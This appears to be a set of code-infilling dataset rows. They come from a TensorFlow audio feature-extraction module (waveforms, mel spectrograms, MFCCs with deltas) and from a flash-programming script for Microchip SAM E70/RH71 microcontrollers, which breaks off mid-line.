waveform_ds = waveform_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(waveform_ds, file_paths, labels_to_integers)
return waveform_ds
def prepare_mel_spectrogram_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = prepare_waveform_dataset(file_paths, sample_rate, clip_duration, False)
# apply short time fourier transform to each waveform
stft_ds = waveform_ds.map(
lambda waveform:
get_stft(waveform, frame_length=fft_frame_length, frame_step=fft_frame_step),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# get mel spectrograms
mel_spectrogram_ds = stft_ds.map(
lambda stft: get_mel_spectrogram(
stft, sample_rate, num_mel_bins, lower_edge_hertz, upper_edge_hertz, log,
add_energy
),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
mel_spectrogram_ds = mel_spectrogram_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(mel_spectrogram_ds, file_paths, labels_to_integers)
return mel_spectrogram_ds
def prepare_mfcc_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
num_mel_bins_to_pick=12,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
mel_spectrogram_ds = prepare_mel_spectrogram_dataset(
file_paths, sample_rate, clip_duration, fft_frame_length, fft_frame_step,
num_mel_bins, lower_edge_hertz, upper_edge_hertz, True, add_energy, False, [],
False
)
mfcc_ds = mel_spectrogram_ds.map(
lambda mel: get_mfcc(
mel, num_mel_bins_to_pick, add_energy, add_first_delta,
add_second_delta, symmetric_zero_padding
),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
mfcc_ds = mfcc_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(mfcc_ds, file_paths, labels_to_integers)
return mfcc_ds
| energy = tf.slice(
log_mel_spectrogram, [0, log_mel_spectrogram.shape[1] - 1],
[log_mel_spectrogram.shape[0], 1]
)
log_mel_spectrogram = tf.slice(
log_mel_spectrogram, [0, 0],
[log_mel_spectrogram.shape[0], log_mel_spectrogram.shape[1] - 1]
) | conditional_block |
audio_processing.py | import os
import tensorflow as tf
def | (file_path):
# each file's label is its directory's name
parts = tf.strings.split(file_path, os.path.sep)
return parts[-2]
def prepare_label_dataset(file_paths):
# create dataset by splitting input tensor to individual items
label_ds = tf.data.Dataset.from_tensor_slices(file_paths)
# extract labels from filepaths
# AUTOTUNE automatically optimizes data prefetching
return label_ds.map(get_label, num_parallel_calls=tf.data.experimental.AUTOTUNE)
def add_labels_to_dataset(dataset, file_paths, label_list=[]):
label_ds = prepare_label_dataset(file_paths)
if len(label_list) > 0:
label_ds = label_ds.map(
lambda label: tf.argmax(label == label_list),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
return tf.data.Dataset.zip((dataset, label_ds))
def get_stft(waveform, frame_length=512, frame_step=256):
# apply short-time Fourier transform
# splits signal into frames and applies Fourier transform on those
# by default uses smallest power of 2 enclosing frame_length for fft size
# uses hann window, an alternative would be hamming window
# https://www.tensorflow.org/api_docs/python/tf/signal/stft
return tf.signal.stft(
waveform,
frame_length=frame_length,
frame_step=frame_step,
window_fn=tf.signal.hann_window,
pad_end=True
)
def get_mel_spectrogram(
stft,
sample_rate,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False
):
# spectrograms need only magnitude from stft
# https://www.tensorflow.org/tutorials/audio/simple_audio#spectrogram
spectrogram = tf.abs(stft)
# the number of bins in the source spectrogram
# understood to be fft_size // 2 + 1
# // == floordiv
# https://www.tensorflow.org/api_docs/python/tf/signal/linear_to_mel_weight_matrix#args
num_spectrogram_bins = spectrogram.shape[-1]
# calculate a weight matrix that can be used to re-weight a spectrogram to mel-scale
linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(
num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,
upper_edge_hertz
)
# convert spectrogram to mel-scale
mel_spectrogram = tf.tensordot(spectrogram, linear_to_mel_weight_matrix, 1)
# print('mel spectrogram shape before: ', mel_spectrogram.shape)
# print('mel spectrogram shape before: ', mel_spectrogram.shape[:-1])
# # https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# # why is this needed?
# mel_spectrogram.set_shape(
# spectrogram.shape[:-1].concatenate(linear_to_mel_weight_matrix.shape[-1:]))
# print('mel spectrogram shape after: ', mel_spectrogram.shape)
if log:
# Compute a stabilized log to get log-magnitude mel-scale spectrograms.
mel_spectrogram = tf.math.log(mel_spectrogram + 1e-6)
if add_energy:
# Compute power spectrum of each frame
audio_power = tf.math.square(spectrogram)
# Compute total energy of each frame and collect them to a column vector
energy = tf.reshape(tf.reduce_sum(audio_power, 1), [audio_power.shape[0], 1])
mel_spectrogram = tf.concat([mel_spectrogram, energy], 1)
return mel_spectrogram
# http://practicalcryptography.com/miscellaneous/machine-learning/guide-mel-frequency-cepstral-coefficients-mfccs/#deltas-and-delta-deltas
# https://github.com/jameslyons/python_speech_features/blob/master/python_speech_features/base.py
# edited to work with tf.tensors
def delta(feat, N):
"""Compute delta features from a feature vector sequence.
:param feat: A tensor of shape (NUMFRAMES, features) containing features. Each row holds 1 feature vector.
:param N: For each frame, calculate delta features based on preceding and following N frames
:returns: A tensor of shape (NUMFRAMES, features) containing delta features. Each row holds 1 delta feature vector.
"""
if N < 1:
raise ValueError('N must be an integer >= 1')
NUMFRAMES = feat.shape[0]
denominator = 2 * sum([i**2 for i in range(1, N + 1)])
delta_feat = tf.reshape((), (0, feat.shape[1]))
padded = tf.pad(
feat, tf.constant([[N, N], [0, 0]]), 'CONSTANT', 0
) # padded version of feat
for t in range(NUMFRAMES):
delta_feat = tf.concat([
delta_feat,
tf.reshape(
tf.tensordot(
tf.range(-N, N + 1, 1, tf.float32), padded[t:t + 2 * N + 1], 1
) / denominator, (1, feat.shape[1])
)
], 0) # [t : t+2*N+1] == [(N+t)-N : (N+t)+N+1]
return delta_feat
def get_mfcc(
log_mel_spectrogram,
num_mel_bins_to_pick=12,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
):
# If add_energy, assume that the last bin in log mel spectrograms represents energy and separate it
if (add_energy):
energy = tf.slice(
log_mel_spectrogram, [0, log_mel_spectrogram.shape[1] - 1],
[log_mel_spectrogram.shape[0], 1]
)
log_mel_spectrogram = tf.slice(
log_mel_spectrogram, [0, 0],
[log_mel_spectrogram.shape[0], log_mel_spectrogram.shape[1] - 1]
)
# https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# Compute MFCCs from log mel spectrograms
# Take num_mel_bins_to_pick bins
mfcc = tf.signal.mfccs_from_log_mel_spectrograms(log_mel_spectrogram)[
..., :num_mel_bins_to_pick]
# add symmetric_zero_padding vectors of zeroes to both ends of the time dimension
if symmetric_zero_padding > 0:
zero_pad = tf.zeros([symmetric_zero_padding, num_mel_bins_to_pick])
mfcc = tf.concat([zero_pad, mfcc, zero_pad], 0)
# Add energy back if it was separated
if add_energy:
mfcc = tf.concat([mfcc, energy], 1)
if add_first_delta:
mfcc_delta = delta(mfcc, 1)
mfcc = tf.concat([mfcc, mfcc_delta], 1)
if add_second_delta:
mfcc_double_delta = delta(mfcc_delta, 1)
mfcc = tf.concat([mfcc, mfcc_double_delta], 1)
return mfcc
def load_audio(audio_file_path, sample_rate, clip_duration):
audio_binary = tf.io.read_file(audio_file_path)
# works only with 16bit wav files
# audio file is assumed to have sample rate equal to sample_rate
# scales to [-1.0, 1.0]
# takes clip_duration seconds of audio
# adds zero padding if clip is too short
tensor, _ = tf.audio.decode_wav(
audio_binary,
desired_channels=1,
desired_samples=int(sample_rate * clip_duration)
)
# remove last dimension, in this case the number of channels
return tf.squeeze(tensor, axis=-1)
def prepare_waveform_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = tf.data.Dataset.from_tensor_slices(file_paths)
waveform_ds = waveform_ds.map(
lambda file_path: load_audio(file_path, sample_rate, clip_duration),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
waveform_ds = waveform_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(waveform_ds, file_paths, labels_to_integers)
return waveform_ds
def prepare_mel_spectrogram_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = prepare_waveform_dataset(file_paths, sample_rate, clip_duration, False)
# apply short time fourier transform to each waveform
stft_ds = waveform_ds.map(
lambda waveform:
get_stft(waveform, frame_length=fft_frame_length, frame_step=fft_frame_step),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# get mel spectrograms
mel_spectrogram_ds = stft_ds.map(
lambda stft: get_mel_spectrogram(
stft, sample_rate, num_mel_bins, lower_edge_hertz, upper_edge_hertz, log,
add_energy
),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
mel_spectrogram_ds = mel_spectrogram_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(mel_spectrogram_ds, file_paths, labels_to_integers)
return mel_spectrogram_ds
def prepare_mfcc_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
num_mel_bins_to_pick=12,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
mel_spectrogram_ds = prepare_mel_spectrogram_dataset(
file_paths, sample_rate, clip_duration, fft_frame_length, fft_frame_step,
num_mel_bins, lower_edge_hertz, upper_edge_hertz, True, add_energy, False, [],
False
)
mfcc_ds = mel_spectrogram_ds.map(
lambda mel: get_mfcc(
mel, num_mel_bins_to_pick, add_energy, add_first_delta,
add_second_delta, symmetric_zero_padding
),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
mfcc_ds = mfcc_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(mfcc_ds, file_paths, labels_to_integers)
return mfcc_ds
| get_label | identifier_name |
audio_processing.py | import os
import tensorflow as tf
def get_label(file_path):
# each file's label is its directory's name
parts = tf.strings.split(file_path, os.path.sep)
return parts[-2]
def prepare_label_dataset(file_paths):
# create dataset by splitting input tensor to individual items
label_ds = tf.data.Dataset.from_tensor_slices(file_paths)
# extract labels from filepaths
# AUTOTUNE automatically optimizes data prefetching
return label_ds.map(get_label, num_parallel_calls=tf.data.experimental.AUTOTUNE)
def add_labels_to_dataset(dataset, file_paths, label_list=[]):
|
def get_stft(waveform, frame_length=512, frame_step=256):
# apply short-time Fourier transform
# splits signal into frames and applies Fourier transform on those
# by default uses smallest power of 2 enclosing frame_length for fft size
# uses hann window, an alternative would be hamming window
# https://www.tensorflow.org/api_docs/python/tf/signal/stft
return tf.signal.stft(
waveform,
frame_length=frame_length,
frame_step=frame_step,
window_fn=tf.signal.hann_window,
pad_end=True
)
def get_mel_spectrogram(
stft,
sample_rate,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False
):
# spectrograms need only magnitude from stft
# https://www.tensorflow.org/tutorials/audio/simple_audio#spectrogram
spectrogram = tf.abs(stft)
# the number of bins in the source spectrogram
# understood to be fft_size // 2 + 1
# // == floordiv
# https://www.tensorflow.org/api_docs/python/tf/signal/linear_to_mel_weight_matrix#args
num_spectrogram_bins = spectrogram.shape[-1]
# calculate a weight matrix that can be used to re-weight a spectrogram to mel-scale
linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(
num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,
upper_edge_hertz
)
# convert spectrogram to mel-scale
mel_spectrogram = tf.tensordot(spectrogram, linear_to_mel_weight_matrix, 1)
# print('mel spectrogram shape before: ', mel_spectrogram.shape)
# print('mel spectrogram shape before: ', mel_spectrogram.shape[:-1])
# # https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# # why is this needed?
# mel_spectrogram.set_shape(
# spectrogram.shape[:-1].concatenate(linear_to_mel_weight_matrix.shape[-1:]))
# print('mel spectrogram shape after: ', mel_spectrogram.shape)
if log:
# Compute a stabilized log to get log-magnitude mel-scale spectrograms.
mel_spectrogram = tf.math.log(mel_spectrogram + 1e-6)
if add_energy:
# Compute power spectrum of each frame
audio_power = tf.math.square(spectrogram)
# Compute total energy of each frame and collect them to a column vector
energy = tf.reshape(tf.reduce_sum(audio_power, 1), [audio_power.shape[0], 1])
mel_spectrogram = tf.concat([mel_spectrogram, energy], 1)
return mel_spectrogram
# http://practicalcryptography.com/miscellaneous/machine-learning/guide-mel-frequency-cepstral-coefficients-mfccs/#deltas-and-delta-deltas
# https://github.com/jameslyons/python_speech_features/blob/master/python_speech_features/base.py
# edited to work with tf.tensors
def delta(feat, N):
"""Compute delta features from a feature vector sequence.
:param feat: A tensor of shape (NUMFRAMES, features) containing features. Each row holds 1 feature vector.
:param N: For each frame, calculate delta features based on preceding and following N frames
:returns: A tensor of shape (NUMFRAMES, features) containing delta features. Each row holds 1 delta feature vector.
"""
if N < 1:
raise ValueError('N must be an integer >= 1')
NUMFRAMES = feat.shape[0]
denominator = 2 * sum([i**2 for i in range(1, N + 1)])
delta_feat = tf.reshape((), (0, feat.shape[1]))
padded = tf.pad(
feat, tf.constant([[N, N], [0, 0]]), 'CONSTANT', 0
) # padded version of feat
for t in range(NUMFRAMES):
delta_feat = tf.concat([
delta_feat,
tf.reshape(
tf.tensordot(
tf.range(-N, N + 1, 1, tf.float32), padded[t:t + 2 * N + 1], 1
) / denominator, (1, feat.shape[1])
)
], 0) # [t : t+2*N+1] == [(N+t)-N : (N+t)+N+1]
return delta_feat
def get_mfcc(
log_mel_spectrogram,
num_mel_bins_to_pick=12,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
):
# If add_energy, assume that the last bin in log mel spectrograms represents energy and separate it
if (add_energy):
energy = tf.slice(
log_mel_spectrogram, [0, log_mel_spectrogram.shape[1] - 1],
[log_mel_spectrogram.shape[0], 1]
)
log_mel_spectrogram = tf.slice(
log_mel_spectrogram, [0, 0],
[log_mel_spectrogram.shape[0], log_mel_spectrogram.shape[1] - 1]
)
# https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# Compute MFCCs from log mel spectrograms
# Take num_mel_bins_to_pick bins
mfcc = tf.signal.mfccs_from_log_mel_spectrograms(log_mel_spectrogram)[
..., :num_mel_bins_to_pick]
# add symmetric_zero_padding vectors of zeroes to both ends of the time dimension
if symmetric_zero_padding > 0:
zero_pad = tf.zeros([symmetric_zero_padding, num_mel_bins_to_pick])
mfcc = tf.concat([zero_pad, mfcc, zero_pad], 0)
# Add energy back if it was separated
if add_energy:
mfcc = tf.concat([mfcc, energy], 1)
if add_first_delta:
mfcc_delta = delta(mfcc, 1)
mfcc = tf.concat([mfcc, mfcc_delta], 1)
if add_second_delta:
mfcc_double_delta = delta(mfcc_delta, 1)
mfcc = tf.concat([mfcc, mfcc_double_delta], 1)
return mfcc
def load_audio(audio_file_path, sample_rate, clip_duration):
audio_binary = tf.io.read_file(audio_file_path)
# works only with 16bit wav files
# audio file is assumed to have sample rate equal to sample_rate
# scales to [-1.0, 1.0]
# takes clip_duration seconds of audio
# adds zero padding if clip is too short
tensor, _ = tf.audio.decode_wav(
audio_binary,
desired_channels=1,
desired_samples=int(sample_rate * clip_duration)
)
# remove last dimension, in this case the number of channels
return tf.squeeze(tensor, axis=-1)
def prepare_waveform_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = tf.data.Dataset.from_tensor_slices(file_paths)
waveform_ds = waveform_ds.map(
lambda file_path: load_audio(file_path, sample_rate, clip_duration),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
waveform_ds = waveform_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(waveform_ds, file_paths, labels_to_integers)
return waveform_ds
def prepare_mel_spectrogram_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = prepare_waveform_dataset(file_paths, sample_rate, clip_duration, False)
# apply short time fourier transform to each waveform
stft_ds = waveform_ds.map(
lambda waveform:
get_stft(waveform, frame_length=fft_frame_length, frame_step=fft_frame_step),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# get mel spectrograms
mel_spectrogram_ds = stft_ds.map(
lambda stft: get_mel_spectrogram(
stft, sample_rate, num_mel_bins, lower_edge_hertz, upper_edge_hertz, log,
add_energy
),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
mel_spectrogram_ds = mel_spectrogram_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(mel_spectrogram_ds, file_paths, labels_to_integers)
return mel_spectrogram_ds
def prepare_mfcc_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
num_mel_bins_to_pick=12,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
mel_spectrogram_ds = prepare_mel_spectrogram_dataset(
file_paths, sample_rate, clip_duration, fft_frame_length, fft_frame_step,
num_mel_bins, lower_edge_hertz, upper_edge_hertz, True, add_energy, False, [],
False
)
mfcc_ds = mel_spectrogram_ds.map(
lambda mel: get_mfcc(
mel, num_mel_bins_to_pick, add_energy, add_first_delta,
add_second_delta, symmetric_zero_padding
),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
mfcc_ds = mfcc_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(mfcc_ds, file_paths, labels_to_integers)
return mfcc_ds
| label_ds = prepare_label_dataset(file_paths)
if len(label_list) > 0:
label_ds = label_ds.map(
lambda label: tf.argmax(label == label_list),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
return tf.data.Dataset.zip((dataset, label_ds)) | identifier_body |
dap_cortex-m7.py | efc_cmd_getd = 0x5a000000
efc_cmd_wp = 0x5a000001
efc_cmd_wpl = 0x5a000002
efc_cmd_ea = 0x5a000005
efc_cmd_epa = 0x5a000007
efc_cmd_slb = 0x5a000008
efc_cmd_clb = 0x5a000009
efc_cmd_glb = 0x5a00000A
efc_cmd_sgpb = 0x5a00000B
efc_cmd_cgpb = 0x5a00000C
efc_cmd_ggpb = 0x5a00000D
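# 0x5a in the upper byte is the EEFC_FCR write key; the low byte selects the
# command (GETD, WP, WPL, EA, EPA, SLB, CLB, GLB, SGPB, CGPB, GGPB).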
if "RH71" in device:
FLASH_START = 0x10000000
PAGE_SIZE = 256
GPNVM_BIT_MASK = 0x2 # Bit mask for user changeable GPNVM bits
efc_fmr = 0x40004000 # HEFC Flash Mode Register
efc_fcr = 0x40004004 # HEFC Flash Command Register
efc_fsr = 0x40004008 # HEFC Flash Status Register
efc_frr = 0x4000400c # HEFC Flash Result Register
efc_fpmr = 0x40004040 # HEFC Flash Power Management Register
efc_wpmr = 0x400040e4 # HEFC Write Protection Mode Register
efc_cmd_ep = 0x5a000006 # available on SAMRH71, but not available on Canopus (SAME70, S70, V70/71)
rstc_cr = 0x40100200
rstc_sr = 0x40100204
rstc_mr = 0x40100208
else:
FLASH_START = 0x0400000
PAGE_SIZE = 512
GPNVM_BIT_MASK = 0x183 # Bit mask for user changeable GPNVM bits
efc_fmr = 0x400e0c00 # EEFC Flash Mode Register
efc_fcr = 0x400e0c04 # EEFC Flash Command Register
efc_fsr = 0x400e0c08 # EEFC Flash Status Register
efc_frr = 0x400e0c0c # EEFC Flash Result Register
efc_wpmr = 0x400e0ce4 # EEFC Write Protection Mode Register
efc_cmd_ewp = 0x5a000003 # available on Canopus (SAME70, S70, V70/71), but not available on SAMRH71
efc_cmd_ewpl = 0x5a000004 # available on Canopus (SAME70, S70, V70/71), but not available on SAMRH71
rstc_cr = 0x400e1800
rstc_sr = 0x400e1804
rstc_mr = 0x400e1808
# Flash strategy
# 0: Halt before programming/read mem operations, run afterwards
# 1: Reset and halt before programming/read mem operations, release from reset afterwards
if "RH71" in device:
flash_strategy = 0
else:
flash_strategy = 1
was_running = False
did_read_operation = False
need_reset_for_read_operations = False
# Workarounds for flash bank startup after reset problems with SAMRH71F20-EK board rev 2.0
rh71_2_0_workaround_VAR_factor = True
rh71_2_0_workaround_init_PC_SP = True
rh71_2_0_workaround_reset_30ms_delay = True
def begin_communication_session():
dev.SetApiLogging(1)
log.setShowOutput(False)
global comm_iface, comm_speed
try:
comm_iface = True if settings["communication.interface"].lower()=="swd" else False
comm_speed = 8000000 if settings["communication.autoselectspeed"] else settings["communication.frequency"]
except:
comm_iface = True
comm_speed = 8000000
def begin_programming_operation():
log.info("begin_programming_operation, interface: %s, freq: %d" % ("SWD" if comm_iface else "JTAG", comm_speed))
dev.Connect(comm_iface, comm_speed)
global was_running
was_running = False
global did_read_operation
did_read_operation = False
if is_target_running():
was_running = True
halt_or_raise()
global need_reset_for_read_operations
need_reset_for_read_operations = True if flash_strategy == 1 else False
def bitsInByte(byteValue):
for i in xrange(8):
yield (byteValue >> i) & 1
def log_efc_fsr_error(fsr):
err_string = ""
if fsr & 0x00080000: # FSR_MECCEMSB
err_string = "MECCEMSB"
if fsr & 0x00040000: # FSR_UECCEMSB
err_string += " UECCEMSB"
if fsr & 0x00020000: # FSR_MECCELSB
err_string += " MECCELSB"
if fsr & 0x00010000: # FSR_UECCELSB
err_string += " UECCELSB"
if fsr & 0x10: # FSR_WREER
err_string += " WREER"
if fsr & 8: # FSR_FLERR
err_string += " FLERR"
if fsr & 4: # FSR_FLOCKE
err_string += " FLOCKE"
if fsr & 2: # FSR_FCMDE
err_string += " FCMDE"
if err_string == "":
return
err_string = err_string + (" from the flash controller after command 0x%0x" % (dev.Read32(efc_fcr)))
log.error(err_string)
def waitForFlashReady():
n = 0
max_retries = 100
while n < max_retries:
r = dev.Read32(efc_fsr)
log_efc_fsr_error(r)
if r & 1: # FSR_FRDY:
break
dev.Delay(100000) # 100ms
n = n+1
if n == max_retries:
raise Exception("Timeout waiting for flash ready")
def halt_or_raise():
halt_target()
n = 0
while n < 100:
if not is_target_running():
return
dev.Delay(100000) # 100ms
n = n+1
raise Exception("Failed to halt target!")
def resetPeripheralsWithRstc():
dev.Write32(rstc_mr, 0xa5000b00) # long(RSTC_KEY) | rstc_erstl)
dev.Write32(rstc_cr, 0xa5000001) # long(RSTC_KEY) | PROCRST)
n = 0
max_retries = 100
while n < max_retries:
dev.Delay(10000) # 10ms
r = dev.Read32(rstc_sr)
if r & 0x00020000: # SRCMP
continue # Software reset in progress
if r & 0x00010000: # NRSTL
break
n = n+1
if n == max_retries:
raise Exception("timeout in reset")
dev.Write32(rstc_mr, 0xa5000001) # long(RSTC_KEY) | URSTEN) # Enable user reset again (URSTEN == 1)
def blank_check(): #mplab
log.info("Prog: Blank check")
def erase():#mplab
log.info("Prog: Erase")
reset_and_halt()
dev.Write32(efc_fcr, efc_cmd_ea)
#log.info("Issued Erase All, wait for flash ready")
waitForFlashReady()
def reset_and_halt():
log.info("Prog: Reset and halt")
# check run state and clear S_RESET_ST so that we can use it to detect end of reset later
if is_target_running():
halt_or_raise()
dev.Write32(arm.DEMCR, 0x01000001) # TRCENA | VC_CORERESET)
if "RH71" in device:
# SAMRH71 use SYSRESETREQ to reset core + peripherals, will loose connection so need to reconnect.
try:
dev.Write32(arm.AIRCR, 0x05fa0004) # VECTKEY | SYSRESETREQ) # 1=VECTRESET 4=SYSRESETREQ
except:
log.info("Reset with SYSRESETREQ, lost connection, try to reconnect to the device")
dev.Disconnect()
dev.Connect(comm_iface, comm_speed)
else:
# Canopus use RSTC (PROCRST) to reset peripherals and VECTRESET to reset core.
resetPeripheralsWithRstc()
dev.Write32(arm.AIRCR, 0x05fa0001) # VECTKEY | VECTRESET) # 1=VECTRESET 4=SYSRESETREQ
n = 0
max_retries = 100
seenReset = False
while n < max_retries:
dhcsr = dev.Read32(arm.DHCSR)
log.info("S_RESET_ST = %s / %s at PC = %X" % ("1" if dhcsr & 0x02000000 else "0", "Halted" if dhcsr & 0x20000 else "RUNNING", get_pc()))
if (dhcsr & 0x02000000): # wait for S_RESET_ST
seenReset = True
hasHalted = 0 != (dhcsr & 0x20000) # S_HALT
if seenReset:
if hasHalted: # wait for S_HALT
break
dev.Delay(100000) # 100ms
n = n+1
dev.Write32(dev.DEMCR, 0x01000000) # TRCENA reset VC_CORERESET bit
if n == max_retries:
raise Exception("timeout in reset")
if "RH71" in device:
initialize_HEFC()
def initialize_HEFC(): # only for SAMRH71
log.info("Prog: initialize_HEFC")
# set up GCLK for HEFC
dev.Write32(0x40100254, 0x00008000) # disable watchdog wdt_mr
dev.Write32(0x4000C020, 0x00370028) # Set internal RC 10 MHz ckgr_mor
dev.Write32(0x4000C10C, 0x30401432) # Set GCLK with div 5 pmc_pcr
if rh71_2_0_workaround_VAR_factor:
set_var_factor_and_power_toggle_flash()
#waitForPWSReady
n = 0
max_retries = 100
while n < max_retries:
r = dev.Read32(efc_fpmr)
if r & 2: # PWS_STAT
dev.Delay(250000) # wait 250ms after seeing PWS_STAT bit
break
dev.Delay(100000) # 100ms
n = n+1
if n == max_retries:
raise Exception("Timeout waiting for PWS ready")
if rh71_2_0_workaround_init_PC_SP:
initialize_PC_SP()
def set_var_factor_and_power_toggle_flash(): # only for SAMRH71, probably only needed for rev 2.0 boards
# Flash reset problem (rev 2.0 of the device): without this workaround the
# flash can only be read on every second reset.
dev.Write32(efc_fpmr, 0x00013F0F) # set var factor at 0x3F 1111
dev.Write32(efc_fpmr, 0x00013F0E) # Power OFF flash 1110
dev.Write32(efc_fpmr, 0x00003F0D) # Power ON flash 1101
def initialize_PC_SP(): # only for SAMRH71, probably only needed for rev 2.0 boards
log.info("Initialize PC and SP (should be done by core, problem in SAMRH71F20-EK board rev 2.0)")
reset_handler = dev.Read32(0x10000004)
old_pc = get_pc()
pc_different = old_pc != (reset_handler & 0xFFFFFFFE)
stack_pointer = dev.Read32(0x10000000)
old_sp = get_sp()
sp_different = old_sp != stack_pointer
if pc_different and reset_handler != 0xFFFFFFFF: # only if the flash is not erased
set_pc(reset_handler)
# Correct EPSR T bit in case core didn't initialize PC and T bit correctly (if PC bit 0 is set, then set T bit)
psr = dev.ReadReg64(16)
if reset_handler & 1 and not psr & 0x01000000:
log.error("PC initialization by core failed, corrected 0x%X -> 0x%X and set EPSR T bit" % (old_pc, get_pc()))
dev.WriteReg64(16, psr | 0x01000000)
else:
log.error("PC initialization by core failed, corrected 0x%X -> 0x%X" % (old_pc, get_pc()))
if sp_different and stack_pointer != 0xFFFFFFFF: # only if the flash is not erased
set_sp(stack_pointer)
log.error("SP initialization by core failed, corrected 0x%X -> 0x%X" % (old_sp, get_sp()))
def hold_in_reset():#mplab
log.info("Prog: Hold in reset")
dev.Connect(comm_iface, comm_speed)
reset_and_halt()
dev.Disconnect()
def release_from_reset():#mplab
log.info("Prog: Release from reset")
# toggle reset line
dev.Pins(0,dev.RESET,1000)
if "RH71" in device and rh71_2_0_workaround_reset_30ms_delay:
dev.Delay(30000) # add 30ms delay holding reset low, needed for SAMRH71 board rev 2.0
dev.Pins(dev.RESET,dev.RESET,1000) # now float reset back
# workaround if reset line is not connected on board
# dev.Write32(dev.AIRCR, 0x05fa0004) # VECTKEY | SYSRESETREQ
def write_flash_page(adr, ofs, data):
log.info("Write flash page adr=0x%0x, ofs=0x%0x" % (adr, ofs))
dev.Write(adr, data, ofs, PAGE_SIZE)
# Remove flash offset, if any, and mask away page internal address bits.
# Position page_number in the FARG bitfield in EFC_FCR
if "RH71" in device:
page_number = adr & 0x3fff00 # SAMRH71 has page_size 256
else:
page_number = (adr & 0x3ffe00)/2 # Canopus has page_size 512
dev.Write32(efc_fcr, efc_cmd_wp | page_number)
waitForFlashReady()
log.info("Written page %d (0x%0x) at 0x%0x" %
